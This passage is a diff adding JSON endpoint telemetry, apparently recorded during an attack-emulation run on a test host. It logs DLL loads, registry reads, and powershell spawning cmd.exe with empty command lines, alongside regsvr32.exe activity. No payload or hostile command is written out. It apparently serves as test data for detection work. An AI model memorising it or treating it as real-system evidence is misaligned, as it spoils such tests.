131883573242759984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\System32\\version.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "winhttp.dll", + "image_path": "C:\\Windows\\System32\\winhttp.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "wkscli.dll", + "image_path": "C:\\Windows\\System32\\wkscli.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573242920000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573242920000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573242920000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "edputil.dll", + "image_path": "C:\\Windows\\System32\\edputil.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573243080000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + 
"image_name": "secur32.dll", + "image_path": "C:\\Windows\\System32\\secur32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573243080000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573243080000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "wininet.dll", + "image_path": "C:\\Windows\\System32\\wininet.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573243230000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content\\CachePrefix", + "registry_value": "CachePrefix", + "timestamp": 131883573243230000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies\\CachePrefix", + "registry_value": "CachePrefix", + 
"timestamp": 131883573243230000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History\\CachePrefix", + "registry_value": "CachePrefix", + "timestamp": 131883573243230000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4664, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573243260000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "process", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "subtype": "terminate", + "timestamp": 131883573243230000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4664, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573243230000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": 
"C:\\Windows\\System32\\ntdll.dll", + "pid": 4664, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573243230000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4664, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573243230000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4664, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573243230000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4664, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573243390000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" + }, + { + "event_type": "process", + "pid": 4664, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573243390000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" + }, + { + "event_type": "image_load", + "image_name": "wow64.dll", + "image_path": "C:\\Windows\\System32\\wow64.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243390000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 
6748, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573243530000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "wow64win.dll", + "image_path": "C:\\Windows\\System32\\wow64win.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243390000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "wow64cpu.dll", + "image_path": "C:\\Windows\\System32\\wow64cpu.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + 
"event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\SysWOW64\\KernelBase.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "registry", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationAssociationToasts", + "registry_value": "ApplicationAssociationToasts", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "policymanager.dll", + "image_path": "C:\\Windows\\System32\\policymanager.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "msvcp110_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp110_win.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\SysWOW64\\apphelp.dll", + "pid": 1284, + "process_name": 
"regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "AcLayers.dll", + "image_path": "C:\\Windows\\SysWOW64\\AcLayers.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcrt.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\SysWOW64\\user32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + 
"unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\SysWOW64\\win32u.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\SysWOW64\\gdi32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\SysWOW64\\gdi32full.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcp_win.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\SysWOW64\\ucrtbase.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\SysWOW64\\shell32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { 
+ "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\SysWOW64\\cfgmgr32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\SysWOW64\\SHCore.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\SysWOW64\\rpcrt4.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\SysWOW64\\sspicli.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\SysWOW64\\cryptbase.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\SysWOW64\\bcryptprimitives.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": 
"sechost.dll", + "image_path": "C:\\Windows\\SysWOW64\\sechost.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\SysWOW64\\combase.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\SysWOW64\\windows.storage.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\SysWOW64\\advapi32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\shlwapi.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel.appcore.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": 
"C:\\Windows\\SysWOW64\\profapi.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\SysWOW64\\powrprof.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\SysWOW64\\fltLib.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\SysWOW64\\oleaut32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "setupapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\setupapi.dll", + "pid": 1284, + "process_name": 
"regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" + }, + { + "event_type": "image_load", + "image_name": "mpr.dll", + "image_path": "C:\\Windows\\SysWOW64\\mpr.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "sfc.dll", + "image_path": "C:\\Windows\\SysWOW64\\sfc.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "winspool.drv", + "image_path": "C:\\Windows\\SysWOW64\\winspool.drv", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\SysWOW64\\propsys.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\SysWOW64\\IPHLPAPI.DLL", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 
131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\SysWOW64\\bcrypt.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "sfc.dll", + "image_path": "C:\\Windows\\SysWOW64\\sfc.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "sfc_os.dll", + "image_path": "C:\\Windows\\SysWOW64\\sfc_os.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\SysWOW64\\imm32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243860000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\SysWOW64\\ole32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573244020000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "WinTypes.dll", + "image_path": "C:\\Windows\\System32\\WinTypes.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + 
"event_type": "image_load", + "image_name": "dwmapi.dll", + "image_path": "C:\\Windows\\System32\\dwmapi.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "subtype": "terminate", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "process", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 
